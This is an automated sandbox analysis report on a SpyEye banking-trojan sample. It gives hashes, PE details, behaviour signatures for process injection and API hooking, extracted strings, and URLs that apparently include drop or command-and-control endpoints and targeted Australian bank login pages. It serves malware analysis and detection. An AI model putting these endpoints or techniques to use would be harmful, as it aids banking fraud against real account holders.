
Joebox - Abstract Analysis File 10058
+ General information
Joebox version: 4.5.0
Start time: 14:55:35
Start date: 01/12/2011
Overall analysis duration: 0h 6m 15s
Target binary file name: SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Target script file name: default.jbs
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 20
Errors:
  • Too many NtReadFile calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
+ Classification / Threat Score
Persistence, Installation Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:
+ Signature Detections
  • Executable is probably coded in Java
  • Printf formatting strings found in memory and binary data
  • Queries a list of all open handles
  • Queries a list of all running processes
  • Spawns processes
  • URLs found in memory or binary data
  • Binary may include packed or crypted data
  • Contains long sleeps (> 4min)
  • Creates a mutex to recognise infected hosts
  • Entrypoint lies outside standard sections
  • PE file contains sections with non-standard names
  • Posts data to webserver
  • Relocates Windows system DLLs to bypass security applications
  • Allocates memory in foreign processes
  • Changes memory attributes in foreign processes to executable or writable
  • Found strings which match to known bank urls
  • Hijacks the control flow in another process
  • Hooks files or directories query functions (used to hide files and directories)
  • Hooks registry keys query functions (used to hide registry keys)
  • Hooks Winsock functions (used for sniffing or altering network traffic)
  • Injects a PE file into a foreign process
  • Modifies the prolog of usermode functions (usermode inline hooks)
  • Writes to foreign memory regions
Static File Information
+ General Information
File name: SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
File size: 254976
MD5: 62d0915f2d31d0a060671d31419a0b80
SHA1: ee79f200b0b1e95b9822c60dd97ed53392d4a27c
SHA256: 68a7b5dd60d9b66f6d895aab540cf295d5d74273baa04224eafff686a189b064
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+ PE Information
+ General
Entrypoint: 0x461080L UPX1
Imagebase: 0x400000L
Time stamp: 0x4DA695A3 [Thu Apr 14 06:35:15 2011 UTC]
Subsystem: windows gui
TLS callbacks:
+ Resources
Name RVA address Size Type
English 0x5d388L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x5d390L 0x5L data
English 0x5d398L 0x5L ISO-8859 text, with no line terminators
English 0x5d3a0L 0x5L ISO-8859 text, with no line terminators
English 0x5d3a8L 0x5L data
English 0x5d3b0L 0x5L ISO-8859 text, with no line terminators
English 0x5d3b8L 0x5L data
English 0x5d3c0L 0x5L data
English 0x5d3c8L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x6238cL 0x300L data
English 0x5d6d0L 0x5L data
English 0x5d6d8L 0x5L ISO-8859 text, with no line terminators
English 0x5d6e0L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x5d6e8L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x5d6f0L 0x5L ISO-8859 text, with no line terminators
English 0x5d6f8L 0x5L ISO-8859 text
English 0x5d700L 0x5L Non-ISO extended-ASCII text, with no line terminators
+ Imports
DLL Import
KERNEL32.DLL LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
advapi32.dll RegEnumKeyW
comctl32.dll ImageList_Add
comdlg32.dll ChooseColorW
crypt32.dll CryptProtectData
gdi32.dll DPtoLP
msimg32.dll AlphaBlend
msvcrt.dll ceil
ole32.dll DoDragDrop
rpcrt4.dll UuidEqual
secur32.dll GetUserNameExW
shell32.dll ShellAboutW
shlwapi.dll UrlIsW
urlmon.dll CreateAsyncBindCtx
user32.dll GetDC
version.dll VerQueryValueW
wininet.dll InternetOpenW
winmm.dll mixerOpen
+ Exports
+ Sections
Name Virtual address Virtual size Raw size entropy
UPX0 0x1000L 0x23000L 0x0L 0.0
UPX1 0x24000L 0x3e000L 0x3d400L 7.95836194309
.rsrc 0x62000L 0x1000L 0xc00L 3.33408150372
+ Version Infos
Description Data
FileVersion 9.10
InternalName Ire Enigma Chimp
ProductVersion 9.10
LegalCopyright Dike © Cain Plate 1996-2007
FileDescription Bowie Mauls Pad Alike Hefty
CompanyName Foundstone Inc.
ProductName Kiwi Arose Odd Hold Bit
OriginalFilename Pro.exe
Translation 0x0409 0x04b0
+ Possible Origin
Language of compilation system Country where language is spoken
English United States
String Analysis
+ Formattings for printf style functions
String value Source
[ERROR] : dwErr == %u ( Could be invalid encryption key ) B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
! R]\%C B6232F3AC2C.exe.dr
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
r = %s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
threadmetadata!nfo%d SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
[ERROR] : dwErr == %u B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
[ERROR] : dwErr == %u ( Config is damaged ) B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%s\Content.IE5\%s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
X%O}9} B6232F3AC2C.exe.dr
L,`%i=q B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe, 07A49F015E0D693.dr
%s%s%s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%UweeF B6232F3AC2C.exe.dr
[ERROR] : Cannot dump file (%u bytes) { %s } B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Content-Length: %u B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Global\%s SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
1+'``Q%E B6232F3AC2C.exe.dr
j}%p#j B6232F3AC2C.exe.dr
^S%e}n B6232F3AC2C.exe.dr
tid=%u&stat= B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%d-%d-%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
(GMT %s%02u:%02u) %s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%d.%d.%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
fx4s%x B6232F3AC2C.exe.dr
Host: %s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
"3Y!%p B6232F3AC2C.exe.dr
%s\Content.IE5\0 B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
!'cGR~U%Spg SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
}V(R%X B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe, 07A49F015E0D693.dr
%s%s&rep=%s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
+ URLs
String value Source
http://ads1.msn.com/library/dap.js explorer.exe
http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.5.1.min.js explorer.exe
http://answers.microsoft.com/en-us explorer.exe
http://c.microsoft.com/trans_pixel.aspx explorer.exe
http://clk.atdmt.com/mrt/go/352379681/direct/01/ explorer.exe
http://clk.atdmt.com/mrt/go/352436867/direct/01/ explorer.exe
http://clk.atdmt.com/mrt/go/356376217/direct/01/ explorer.exe
http://crm.dynamics.com/en-us/ explorer.exe
http://explore.live.com/windows-live-essentials explorer.exe
http://go.microsoft.com/?linkid=2028325 explorer.exe
http://go.microsoft.com/?linkid=4412892 explorer.exe
http://go.microsoft.com/?linkid=9635967 explorer.exe
http://go.microsoft.com/fwlink/?linkid=194811 explorer.exe
http://go.microsoft.com/fwlink/?linkid=81184 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139750 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139753 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139754 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139755 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139756 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139757 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=194812 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=194814 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=205329 explorer.exe
http://i.microsoft.com/en-us/homepage/bimapping.js?gv=bimapping&k=/en-us/homepage/components/bimapping.xml&v=-257223966 explorer.exe
http://i.microsoft.com/en-us/homepage/script.jsx?k=~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataretrievers.attr.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataretrievers.structure.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.queue.js;~/shared/templates/components/mscomviews/controls/scripts/wedcs.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataconsumers.wedcs.js;~/shared/templates/components/mscomviews/controls/scripts/webtrends_16.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataconsumers.webtrends.js&v=-1065951950 explorer.exe
http://i.microsoft.com/en-us/homepage/script.jsx?k=~/shared/templates/components/mscomviews/controls/scripts/mscomhelper.js;~/shared/templates/components/mscomviews/blade/blade.js;~/shared/templates/components/mscomviews/search/search.js;~/shared/templates/components/mscomviews/localepicker/localepicker.js&v=-282235141 explorer.exe
http://i.microsoft.com/en-us/homepage/script.jsx?k=~/shared/templates/components/mscomviews/vpivot/vpivot.js;~/shared/templates/components/mscomviews/grid/grid.js;~/shared/templates/components/mscomviews/hero/hero.js;~/shared/templates/components/mscomviews/accordion/accordion.js;~/shared/templates/components/mscomviews/carousel/carousel.js&v=1793508902 explorer.exe
http://i.microsoft.com/en-us/homepage/shared/templates/components/hpsearch/images/searchsprite.ltr.gif explorer.exe
http://i.microsoft.com/en-us/homepage/style.cssx?k=~/shared/templates/components/mscomviews/vpivot/vpivot-css.aspx;~/shared/templates/components/mscomviews/grid/grid-css.aspx;~/shared/templates/components/mscomviews/hero/hero-css.aspx;~/shared/templates/components/mscomviews/accordion/accordion-css.aspx;~/shared/templates/components/mscomviews/controls/featureitem/featureitem-css.aspx;~/shared/templates/components/mscomviews/carousel/carousel-css.aspx;~/shared/templates/components/mscomviews/list/list-css.aspx&sc=/en-us/homepage/site.config&pc=&v=-23108820 explorer.exe
http://i.microsoft.com/en-us/homepage/style.cssx?k=~/shared/templates/master/hpmaster/master-css.aspx;~/shared/templates/components/mscomviews/blade/blade-css.aspx;~/shared/templates/components/mscomviews/header/he explorer.exe
http://i.microsoft.com/en-us/homepage/style.cssx?k=~/shared/templates/master/hpmaster/master-css.aspx;~/shared/templates/components/mscomviews/blade/blade-css.aspx;~/shared/templates/components/mscomviews/header/header-css.aspx;~/shared/templates explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/ielogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/officelogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/phonelogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/windowslogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/xboxlogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/hero/multi_appearance_v1_530x320_lt.jpg explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprite.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/16/bg_fade.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/16/bg_skirtsolid.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/microsoft.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/microsoft_gray.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/white-carousel.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/white_vpivot.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/answers_sm.jpg explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/office2010hs_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/officelogo_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/safetyscanner_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/winupdate_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/wp_red_sm.png explorer.exe
http://i3.microsoft.com/library/svy/broker.js explorer.exe
http://msdn.microsoft.com/en explorer.exe
http://msdn.microsoft.com/en-us/default.aspx explorer.exe
http://msdn.microsoft.com/en-us/evalcenter/default explorer.exe
http://msdn.microsoft.com/en-us/evalcenter/default.aspx explorer.exe
http://office.microsoft.com/ explorer.exe
http://office.microsoft.com/en-us/ explorer.exe
http://office.microsoft.com/en-us/clipart/default.aspx explorer.exe
http://office.microsoft.com/en-us/downloads explorer.exe
http://office.microsoft.com/en-us/downloads/downloads-marketplace-categories-fx102300516.aspx?category=cl102475746#last=;index=0 explorer.exe
http://office.microsoft.com/en-us/excel/ explorer.exe
http://office.microsoft.com/en-us/home-and-student/office-home-and-student-fx101845698.aspx explorer.exe
http://office.microsoft.com/en-us/images/default.aspx explorer.exe
http://office.microsoft.com/en-us/support explorer.exe
http://office.microsoft.com/en-us/support/ explorer.exe
http://office.microsoft.com/en-us/templates/ explorer.exe
http://office.microsoft.com/en-us/templates/default.aspx explorer.exe
http://office.microsoft.com/en-us/try explorer.exe
http://office.microsoft.com/en-us/web-apps/ explorer.exe
http://pinpoint.microsoft.com/?wt.mc_id=mscom_hp_us_nav_pc_solutions explorer.exe
http://pinpoint.microsoft.com/en-us/default.aspx?wt.mc_id=mscom_hp_us_bl_pinpoint explorer.exe
http://search.microsoft.com/results.aspx?form=mshome&mkt= explorer.exe
http://search.microsoft.com/shared/templates/master/smcpage/autosuggesthandler.ashx?q= explorer.exe
http://shop.solution-networks.de/index2.php explorer.exe
http://shop.solution-networks.de/index2.php;80 explorer.exe
http://store.microsoft.com/microsoft/computers/category/410 explorer.exe
http://support.microsoft.com/ explorer.exe
http://support.microsoft.com/?ln=en-us&x=16&y=12 explorer.exe
http://support.microsoft.com/fixit explorer.exe
http://support.microsoft.com/gp/windows_mobile_master#tab0 explorer.exe
http://support.microsoft.com/search explorer.exe
http://technet.microsoft.com/en-us/bb736012.aspx explorer.exe
http://technet.microsoft.com/en-us/default.aspx explorer.exe
http://technet.microsoft.com/en-us/network/bb530679 explorer.exe
http://technet.microsoft.com/en-us/wsus/default.aspx explorer.exe
http://update.microsoft.com/microsoftupdate explorer.exe
http://windows.microsoft.com/ explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/downloads/ie explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/help explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/products/ie-9/features/download-manager explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/products/ie/home explorer.exe
http://windows.microsoft.com/en-us/windows/downloads explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/personalize/themes explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/personalize/wallpaper-desktop-background explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/service-packs explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/windows-media-player explorer.exe
http://windows.microsoft.com/en-us/windows/help explorer.exe
http://windows.microsoft.com/en-us/windows/help/learn-how-to-install-windows-xp-service-pack-3-sp3 explorer.exe
http://windows.microsoft.com/en-us/windows/home explorer.exe
http://windows.microsoft.com/en-us/windows/products explorer.exe
http://windows.microsoft.com/en-us/windows/products/security-essentials explorer.exe
http://windows.microsoft.com/en-us/windows7/looking-for-windows-messenger explorer.exe
http://windows.microsoft.com/en-us/windows7/products/features/internet-tv explorer.exe
http://windows.microsoft.com/en-us/windows7/products/features/movie-maker explorer.exe
http://windows.microsoft.com/en-us/windows7/products/features/photo-gallery explorer.exe
http://windows.microsoft.com/en-us/windows7/seeing-is-believing-use-a-webcam-to-bring-your-instant-messaging-to-life explorer.exe
http://windows.microsoft.com/en-us/windows7/understanding-security-and-safer-computing explorer.exe
http://www.bing.com/ explorer.exe
http://www.bing.com/finance/ explorer.exe
http://www.bing.com/images/ explorer.exe
http://www.bing.com/maps/ explorer.exe
http://www.bing.com/music explorer.exe
http://www.bing.com/music/lyrics explorer.exe
http://www.bing.com/news explorer.exe
http://www.bing.com/search?form=mshpls&q= explorer.exe
http://www.bing.com/shopping explorer.exe
http://www.bing.com/travel/ explorer.exe
http://www.bing.com/videos explorer.exe
http://www.bing.com/weather/search?q=weather explorer.exe
http://www.drankenservicestein.nl/index2.php explorer.exe
http://www.drankenservicestein.nl/index2.php;800 explorer.exe
http://www.gamesforwindows.com/en-us explorer.exe
http://www.gamesforwindows.com/en-us/ explorer.exe
http://www.gooeylouiecake.com/test/index2.php explorer.exe
http://www.gooeylouiecake.com/test/index2.php;80 explorer.exe
http://www.ieaddons.com/ explorer.exe
http://www.microsoft.co explorer.exe
http://www.microsoft.com explorer.exe
http://www.microsoft.com/ explorer.exe
http://www.microsoft.com/about/default.mspx explorer.exe
http://www.microsoft.com/ar/eg/ explorer.exe
http://www.microsoft.com/ar/gulf/ explorer.exe
http://www.microsoft.com/ar/iq/ explorer.exe
http://www.microsoft.com/ar/ly/ explorer.exe
http://www.microsoft.com/ar/sa/ explorer.exe
http://www.microsoft.com/ar/xm/ explorer.exe
http://www.microsoft.com/athome/organization/twomonitors.aspx explorer.exe
http://www.microsoft.com/athome/organization/wirelesssetup.aspx explorer.exe
http://www.microsoft.com/athome/setup/maintenance.aspx explorer.exe
http://www.microsoft.com/athome/setup/wirelesstips.aspx explorer.exe
http://www.microsoft.com/athome/students/timewastergames.aspx explorer.exe
http://www.microsoft.com/az-latn/az/ explorer.exe
http://www.microsoft.com/be/by/ explorer.exe
http://www.microsoft.com/bg/bg/ explorer.exe
http://www.microsoft.com/bi explorer.exe
http://www.microsoft.com/bs/ba/ explorer.exe
http://www.microsoft.com/business explorer.exe
http://www.microsoft.com/business/en-us/?fbid=la48qib2qmo explorer.exe
http://www.microsoft.com/business/en-us/default.aspx explorer.exe
http://www.microsoft.com/business/en-us/resources/startups/business-plans-entities/how-to-write-a-business-plan.aspx explorer.exe
http://www.microsoft.com/careers explorer.exe
http://www.microsoft.com/careers/ explorer.exe
http://www.microsoft.com/cloud/ explorer.exe
http://www.microsoft.com/communities/forums/default.mspx explorer.exe
http://www.microsoft.com/cs/cz/ explorer.exe
http://www.microsoft.com/da/dk/ explorer.exe
http://www.microsoft.com/de/at/ explorer.exe
http://www.microsoft.com/de/ch/ explorer.exe
http://www.microsoft.com/de/de/ explorer.exe
http://www.microsoft.com/download/en/?wt.mc_id=mscom_en_us_hp_module_12 explorer.exe
http://www.microsoft.com/download/en/?wt.mc_id=mscom_en_us_hp_module_121lsus008226 explorer.exe
http://www.microsoft.com/download/en/default.aspx explorer.exe
http://www.microsoft.com/download/en/default.aspx?wt.mc_id=mscom_hp_us_nav_downloads explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=16&wt.mc_id=mscom_en_us_hp_module_121lsus008548 explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=17851&wt.mc_id=mscom_en_us_hp_module_121lsus007996 explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=3&wt.mc_id=mscom_en_us_hp_module_121lsus007870 explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=35&wt.mc_id=mscom_en_us_hp_module_121lsus007776 explorer.exe
http://www.microsoft.com/downloads/en/default.aspx explorer.exe
http://www.microsoft.com/downloads/en/details.aspx?familyid=2da43d38-db71-4c1b-bc6a-9b6652cd92a3 explorer.exe
http://www.microsoft.com/downloads/en/details.aspx?familyid=3c4a9767-6f29-4cd1-93e7-0a738d2d4fc9 explorer.exe
http://www.microsoft.com/downloads/en/details.aspx?familyid=9cfb2d51-5ff4-4491-b0e5-b386f32c0992 explorer.exe
http://www.microsoft.com/dynamics explorer.exe
http://www.microsoft.com/el/gr/ explorer.exe
http://www.microsoft.com/en-us/ explorer.exe
http://www.microsoft.com/en-us/cloud/default.aspx explorer.exe
http://www.microsoft.com/en-us/default.aspx explorer.exe
http://www.microsoft.com/en-us/dynamics/default.aspx explorer.exe
http://www.microsoft.com/en-us/showcase/default.aspx explorer.exe
http://www.microsoft.com/en-us/skype/ explorer.exe
http://www.microsoft.com/en/au/ explorer.exe
http://www.microsoft.com/en/bd/ explorer.exe
http://www.microsoft.com/en/bn/ explorer.exe
http://www.microsoft.com/en/ca/ explorer.exe
http://www.microsoft.com/en/cy/ explorer.exe
http://www.microsoft.com/en/eg/ explorer.exe
http://www.microsoft.com/en/esa/ explorer.exe
http://www.microsoft.com/en/gb/ explorer.exe
http://www.microsoft.com/en/gulf/ explorer.exe
http://www.microsoft.com/en/hk/ explorer.exe
http://www.microsoft.com/en/id/ explorer.exe
http://www.microsoft.com/en/ie/ explorer.exe
http://www.microsoft.com/en/in/ explorer.exe
http://www.microsoft.com/en/jo/ explorer.exe
http://www.microsoft.com/en/lb/ explorer.exe
http://www.microsoft.com/en/lk/ explorer.exe
http://www.microsoft.com/en/mt/ explorer.exe
http://www.microsoft.com/en/my/ explorer.exe
http://www.microsoft.com/en/ng/ explorer.exe
http://www.microsoft.com/en/nz/ explorer.exe
http://www.microsoft.com/en/ph/ explorer.exe
http://www.microsoft.com/en/pk/ explorer.exe
http://www.microsoft.com/en/sa/ explorer.exe
http://www.microsoft.com/en/sg/ explorer.exe
http://www.microsoft.com/en/us/sitemap.aspx explorer.exe
http://www.microsoft.com/en/westindies/default.aspx explorer.exe
http://www.microsoft.com/en/xf/ explorer.exe
http://www.microsoft.com/en/xm/ explorer.exe
http://www.microsoft.com/en/za/ explorer.exe
http://www.microsoft.com/enterprise/ explorer.exe
http://www.microsoft.com/enterprise/default.aspx explorer.exe
http://www.microsoft.com/es/ar/ explorer.exe
http://www.microsoft.com/es/bo/ explorer.exe
http://www.microsoft.com/es/cl/ explorer.exe
http://www.microsoft.com/es/co/ explorer.exe
http://www.microsoft.com/es/cr/ explorer.exe
http://www.microsoft.com/es/do/ explorer.exe
http://www.microsoft.com/es/ec/ explorer.exe
http://www.microsoft.com/es/es/ explorer.exe
http://www.microsoft.com/es/gt/ explorer.exe
http://www.microsoft.com/es/hn/ explorer.exe
http://www.microsoft.com/es/mx/ explorer.exe
http://www.microsoft.com/es/ni/ explorer.exe
http://www.microsoft.com/es/pa/ explorer.exe
http://www.microsoft.com/es/pe/ explorer.exe
http://www.microsoft.com/es/pr/ explorer.exe
http://www.microsoft.com/es/py/ explorer.exe
http://www.microsoft.com/es/sv/ explorer.exe
http://www.microsoft.com/es/uy/ explorer.exe
http://www.microsoft.com/es/ve/ explorer.exe
http://www.microsoft.com/es/xl/ explorer.exe
http://www.microsoft.com/et/ee/ explorer.exe
http://www.microsoft.com/expression/default.aspx explorer.exe
http://www.microsoft.com/fi/fi/ explorer.exe
http://www.microsoft.com/fr/be/ explorer.exe
http://www.microsoft.com/fr/ca/ explorer.exe
http://www.microsoft.com/fr/ch/ explorer.exe
http://www.microsoft.com/fr/dz/ explorer.exe
http://www.microsoft.com/fr/fr/ explorer.exe
http://www.microsoft.com/fr/ioi/ explorer.exe
http://www.microsoft.com/fr/ma/ explorer.exe
http://www.microsoft.com/fr/tn/ explorer.exe
http://www.microsoft.com/fr/wca/ explorer.exe
http://www.microsoft.com/fr/xf/ explorer.exe
http://www.microsoft.com/games/ explorer.exe
http://www.microsoft.com/getsilverlight/get-started/install/default.aspx explorer.exe
http://www.microsoft.com/hardware/default.aspx explorer.exe
http://www.microsoft.com/hardware/downloads/default.mspx explorer.exe
http://www.microsoft.com/hardware/en-us explorer.exe
http://www.microsoft.com/hardware/en-us/support explorer.exe
http://www.microsoft.com/hardware/mouseandkeyboard/default.mspx explorer.exe
http://www.microsoft.com/he/il/ explorer.exe
http://www.microsoft.com/hr/hr/ explorer.exe
http://www.microsoft.com/hu/hu/ explorer.exe
http://www.microsoft.com/hy/am/ explorer.exe
http://www.microsoft.com/industry/government/solutions/usgcb/default.aspx explorer.exe
http://www.microsoft.com/investor explorer.exe
http://www.microsoft.com/is/is/ explorer.exe
http://www.microsoft.com/it/it/ explorer.exe
http://www.microsoft.com/ja/jp/ explorer.exe
http://www.microsoft.com/ka/ge/ explorer.exe
http://www.microsoft.com/ko/kr/ explorer.exe
http://www.microsoft.com/learning/en/us/default.aspx explorer.exe
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx explorer.exe
http://www.microsoft.com/licensing/default.mspx explorer.exe
http://www.microsoft.com/lt/lt/ explorer.exe
http://www.microsoft.com/lv/lv/ explorer.exe
http://www.microsoft.com/mk/mk/ explorer.exe
http://www.microsoft.com/nb/no/ explorer.exe
http://www.microsoft.com/news explorer.exe
http://www.microsoft.com/nl/be/ explorer.exe
http://www.microsoft.com/nl/nl/ explorer.exe
http://www.microsoft.com/office explorer.exe
http://www.microsoft.com/pl/pl/ explorer.exe
http://www.microsoft.com/presspass/default.mspx explorer.exe
http://www.microsoft.com/presspass/features/2011/nov11/11-28bingtopterms.mspx explorer.exe
http://www.microsoft.com/presspass/press/2011/nov11/11-29safetykleenpr.mspx explorer.exe
http://www.microsoft.com/presspass/presskits/office/online explorer.exe
http://www.microsoft.com/pt/br/ explorer.exe
http://www.microsoft.com/pt/pt/ explorer.exe
http://www.microsoft.com/ro/md/ explorer.exe
http://www.microsoft.com/ro/ro/ explorer.exe
http://www.microsoft.com/ru/kz/ explorer.exe
http://www.microsoft.com/ru/ru/ explorer.exe
http://www.microsoft.com/security/default.aspx explorer.exe
http://www.microsoft.com/security/pc-security/conficker.aspx explorer.exe
http://www.microsoft.com/security/pc-security/default.aspx explorer.exe
http://www.microsoft.com/security/pc-security/firewalls-whatis.aspx explorer.exe
http://www.microsoft.com/security/pc-security/malware-removal.aspx explorer.exe
http://www.microsoft.com/security/r explorer.exe
http://www.microsoft.com/security/resources/antivirus-whatis.aspx explorer.exe
http://www.microsoft.com/security/scanner/en-us/default.aspx explorer.exe
http://www.microsoft.com/servers/home.mspx explorer.exe
http://www.microsoft.com/serviceproviders/saas/default.mspx explorer.exe
http://www.microsoft.com/sk/ explorer.exe
http://www.microsoft.com/sk/sk/ explorer.exe
http://www.microsoft.com/sl/si/ explorer.exe
http://www.microsoft.com/sq/al/ explorer.exe
http://www.microsoft.com/sqlserver/en/us/default.aspx explorer.exe
http://www.microsoft.com/sr/latn-me/ explorer.exe
http://www.microsoft.com/sr/latn-rs/ explorer.exe
http://www.microsoft.com/sv/se/ explorer.exe
http://www.microsoft.com/th/th/ explorer.exe
http://www.microsoft.com/tr/tr/ explorer.exe
http://www.microsoft.com/ukr/ua/ explorer.exe
http://www.microsoft.com/vi/vn/ explorer.exe
http://www.microsoft.com/win explorer.exe
http://www.microsoft.com/windowsphone/en-us/apps/default.aspx explorer.exe
http://www.microsoft.com/windowsphone/en-us/buy/7/default.aspx explorer.exe
http://www.microsoft.com/windowsphone/en-us/buy/7/phones.aspx explorer.exe
http://www.microsoft.com/windowsphone/en-us/default.aspx explorer.exe
http://www.microsoft.com/zh/cn/ explorer.exe
http://www.microsoft.com/zh/hk/ explorer.exe
http://www.microsoft.com/zh/tw/ explorer.exe
http://www.microsoftstore.com/ explorer.exe
http://www.microsoftstore.com/store/msstore/cat/categoryid.50606600 explorer.exe
http://www.microsoftstore.com/store/msstore/cat/parentcategoryid.44067000/categoryid.50791300 explorer.exe
http://www.microsoftstore.com/store/msstore/en_us/cat/parentcategoryid.37946100/categoryid.50799400?wt.mc_id=mscom_hp_us_bl_buybizsoftware explorer.exe
http://www.microsoftstore.com/store/msstore/list/parentcategoryid.44066900/categoryid.50787200 explorer.exe
http://www.microsoftstore.com/store/msstore/list/parentcategoryid.50606600/categoryid.50789900 explorer.exe
http://www.update.microsoft.com/microsoftupdate/v6/vistadefault.aspx?ln=en-us explorer.exe
http://www.w3.org/1999/xhtml explorer.exe
http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd explorer.exe
http://www.xbox.com/ explorer.exe
http://www.xbox.com/en-us/ explorer.exe
http://www.zune.com/ explorer.exe
https://ibank.b-e.com.au/ibank/ svchost.exe
https://ibank.b-e.com.au/ibank/login.asp MDM.EXE, svchost.exe
https://ibank.melbcdf.com.au/brisbanemyviewpoint/login.asp svchost.exe
https://internetbanking.firstoptioncu.com.au/mvptab/login.asp svchost.exe
https://mvp.novacu.com.au/mvpnova/login.asp svchost.exe
https://mvp.sccu.com.au/mvpsccu/login.asp svchost.exe
https://netteller.sydneycu.com.au/802084v45/ntv45.asp?wci=entry svchost.exe
https://netteller2.victeach.com.au/704191v47/ntv47.asp?wci=entry svchost.exe
https://online.westpac.com.au/esis/login/srvpage svchost.exe
https://partner.microsoft.com/us/30000104 explorer.exe
https://profile.microsoft.com/regsysprofilecenter/default.aspx?lcid=1033 explorer.exe
https://secure.accu.com.au/secureaccu2/ebank.jsp svchost.exe
